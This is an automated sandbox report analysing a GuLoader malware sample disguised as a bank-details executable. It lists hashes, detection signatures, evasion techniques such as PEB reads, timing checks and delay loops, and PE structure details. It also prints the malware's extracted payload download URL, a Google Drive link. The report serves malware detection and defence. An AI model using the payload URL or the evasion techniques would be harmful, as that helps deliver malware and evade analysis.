Play interactive tour

Edit tour

Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Sample Name:	Foreign_Bank Account Details.exe
Analysis ID:	500790
MD5:	8906fa5fed7b1d3d2e5579d97419c076
SHA1:	f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256:	d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9
Tags:	exeguloader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Found potential dummy code loops (likely to delay analysis)

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to call native functions

Program does not show much activity (idle)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

Foreign_Bank Account Details.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 8906FA5FED7B1D3D2E5579D97419C076)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1hKAWruhccvaKl72"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1hKAWruhccvaKl72"}

Multi AV Scanner detection for submitted file

Show sources

Source: Foreign_Bank Account Details.exe

ReversingLabs: Detection: 33%

Source: Foreign_Bank Account Details.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 5x nop then mov edx, edx	0_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 6x nop then mov edx, edx	0_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 5x nop then mov edx, edx	0_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 6x nop then mov edx, edx	0_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_00402267
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 5x nop then mov edx, edx	0_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 6x nop then mov edx, edx	0_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_004022E9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_00402379
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 5x nop then mov edx, edx	0_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 6x nop then mov edx, edx	0_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 6x nop then mov edx, edx	0_2_004021F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 4x nop then mov ecx, ecx	0_2_004021F3

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1hKAWruhccvaKl72

Source: Foreign_Bank Account Details.exe, 00000000.00000002.765735335.000000000072A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: Foreign_Bank Account Details.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Foreign_Bank Account Details.exe, 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefigurmrk.exe vs Foreign_Bank Account Details.exe
Source: Foreign_Bank Account Details.exe	Binary or memory string: OriginalFilenamefigurmrk.exe vs Foreign_Bank Account Details.exe

Source: Foreign_Bank Account Details.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004012D8	0_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00402061	0_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004020E7	0_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004022E9	0_2_004022E9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_0040191F	0_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CBFDE	0_2_020CBFDE
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C80F9	0_2_020C80F9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C5E21	0_2_020C5E21
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C6651	0_2_020C6651
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C6E70	0_2_020C6E70
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8698	0_2_020C8698
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CA6A7	0_2_020CA6A7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C6ABF	0_2_020C6ABF
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C7AFA	0_2_020C7AFA
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CAEF3	0_2_020CAEF3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C639E	0_2_020C639E
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CA3AD	0_2_020CA3AD
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8BBD	0_2_020C8BBD
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C67BE	0_2_020C67BE
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CABE2	0_2_020CABE2
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C6BFC	0_2_020C6BFC
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CB009	0_2_020CB009
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C5C13	0_2_020C5C13
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CAC45	0_2_020CAC45
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C5C54	0_2_020C5C54
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C5C74	0_2_020C5C74
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C80C2	0_2_020C80C2
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C4D15	0_2_020C4D15
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8154	0_2_020C8154
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C796A	0_2_020C796A
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C9D8F	0_2_020C9D8F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8598	0_2_020C8598
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CA5DF	0_2_020CA5DF
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C85E0	0_2_020C85E0

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C80F9 NtAllocateVirtualMemory,	0_2_020C80F9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8234 NtAllocateVirtualMemory,	0_2_020C8234
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8253 NtAllocateVirtualMemory,	0_2_020C8253
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C82B3 NtAllocateVirtualMemory,	0_2_020C82B3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8352 NtAllocateVirtualMemory,	0_2_020C8352
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8371 NtAllocateVirtualMemory,	0_2_020C8371
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C80C2 NtAllocateVirtualMemory,	0_2_020C80C2
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C8154 NtAllocateVirtualMemory,	0_2_020C8154
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C819A NtAllocateVirtualMemory,	0_2_020C819A

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Process Stats: CPU usage > 98%

Source: Foreign_Bank Account Details.exe

ReversingLabs: Detection: 33%

Source: Foreign_Bank Account Details.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal80.rans.troj.evad.winEXE@1/0@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00414356 push eax; ret	0_2_004147B5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00404A4A push edx; iretd	0_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00404252 push eax; iretd	0_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00404A5E push edx; iretd	0_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00402E00 push edx; iretd	0_2_00402E01
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_0040562D push edi; iretd	0_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004052C1 pushfd ; retf	0_2_00405307
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004048C4 push edi; iretd	0_2_004048C5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004040D2 push es; ret	0_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004040DE push es; ret	0_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004076EF pushfd ; retf	0_2_004076F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004068F0 push eax; iretd	0_2_004068FD
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004058F6 push edx; iretd	0_2_004058F9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004082F9 push eax; iretd	0_2_00408305
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00406E91 push ecx; iretd	0_2_00406E9D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00408298 push ebx; iretd	0_2_00408299
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00406C9E push eax; iretd	0_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00406EBF push eax; iretd	0_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00403948 push ecx; iretd	0_2_00403949
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_0040416E push es; ret	0_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00404112 push es; ret	0_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00405F20 push esi; iretd	0_2_00405F21
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004061CE push esi; iretd	0_2_004061E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004055CF push edi; iretd	0_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004059E4 push edi; iretd	0_2_004059E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_0040638D push 569795EEh; iretd	0_2_004063A5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00402F9E push esi; iretd	0_2_00402FA1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004059A0 push eax; iretd	0_2_004059A1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004041BB push eax; iretd	0_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004043BB push edx; iretd	0_2_004043C1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C7689 push 737A652Eh; iretd	0_2_020C9824

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Code function: 0_2_020C7A45 rdtsc

0_2_020C7A45

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_004012D8 mov ebx, dword ptr fs:[00000030h]	0_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_00402061 mov ebx, dword ptr fs:[00000030h]	0_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_0040191F mov ebx, dword ptr fs:[00000030h]	0_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C9EE3 mov eax, dword ptr fs:[00000030h]	0_2_020C9EE3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CB009 mov eax, dword ptr fs:[00000030h]	0_2_020CB009
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020CA450 mov eax, dword ptr fs:[00000030h]	0_2_020CA450
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe	Code function: 0_2_020C78C4 mov eax, dword ptr fs:[00000030h]	0_2_020C78C4

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Code function: 0_2_020C7A45 rdtsc

0_2_020C7A45

Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe

Code function: 0_2_020CBFDE RtlAddVectoredExceptionHandler,

0_2_020CBFDE

Source: Foreign_Bank Account Details.exe, 00000000.00000002.766067230.0000000000CB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Foreign_Bank Account Details.exe, 00000000.00000002.766067230.0000000000CB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Foreign_Bank Account Details.exe, 00000000.00000002.766067230.0000000000CB0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: Foreign_Bank Account Details.exe, 00000000.00000002.766067230.0000000000CB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Foreign_Bank Account Details.exe, 00000000.00000002.766067230.0000000000CB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery11	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Foreign_Bank Account Details.exe	33%	ReversingLabs	Win32.Trojan.FormBook

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	500790
Start date:	12.10.2021
Start time:	09:27:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Foreign_Bank Account Details.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 37.3% (good quality ratio 17.3%) Quality average: 23.5% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 55% Number of executed functions: 25 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.203.141.148, 95.100.216.89, 20.50.102.62, 40.112.88.60, 20.82.209.183, 2.20.178.33, 2.20.178.24, 20.54.110.249 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.50003203322486
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Foreign_Bank Account Details.exe
File size:	135168
MD5:	8906fa5fed7b1d3d2e5579d97419c076
SHA1:	f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256:	d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9
SHA512:	e34aa27e530b1e57a33e483eca15739570b105485d722da4a7a2f921abfe2383e5044d85bdd91e6d0ac80a5c3e8896d6dc7ed5b662ddbd1ab56c7c8349777871
SSDEEP:	3072:wHohMc/81QScUhU7FeiRaz+7kOMr7d2PhOdnXhWZ2QLqw9mh7ObETDuvTuqZccm4:wHoBzsuRcw4rCh
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.[.J...J...J..9V...J...h...J...l...J..Rich.J..................PE..L...]..R.................P...................`....@........

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4012d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5288055D [Sat Nov 16 23:53:01 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0a8e5f9658f839d07c08aa4f38837bac

Entrypoint Preview

Instruction
push 00411750h
call 00007F5ED8A09D15h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [esi], edx
xor dword ptr [edi-47h], esi
inc ecx
mov es, word ptr [edi-6Fh]
cld
cmp dword ptr [edi], ebx
jbe 00007F5ED8A09D2Fh
int1
jp 00007F5ED8A09D22h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+6Dh], ah
bound ebp, dword ptr [ecx+69h]
add byte ptr fs:[eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
and ebp, dword ptr [eax+4F90F37Bh]
pop esi
dec eax
inc esp
mov bh, ECh
insb
in al, dx
int1
push es
scasd
outsd
rcr byte ptr [esp+ebp*2-28h], cl
push esi
pop ebx
inc ecx
mov bl, 77h
imul ebp, edx, 44F5ABABh
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov al, FCh
add byte ptr [eax], al
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 706E5500h
jc 00007F5ED8A09D91h
add byte ptr [50000901h], cl
push edx
inc ebp
inc ecx
inc ebx
inc ebx
dec edi
dec ebp
dec ebp
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah
add byte ptr [eax+eax], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x9749	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xf4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14518	0x15000	False	0.578311011905	data	6.68181233004	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0x15fc	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x9749	0xa000	False	0.217749023437	data	5.47873434424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x21727	0x22	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x21706	0x21	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x216e5	0x21	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x216c7	0x1e	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x216ab	0x1c	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x18c68	0x8a43	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x18c4a	0x1e	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x18c1d	0x2d	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x18bfc	0x21	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x18acc	0x130	data
RT_ICON	0x187e4	0x2e8	data
RT_ICON	0x186bc	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1868c	0x30	data
RT_VERSION	0x18320	0x36c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

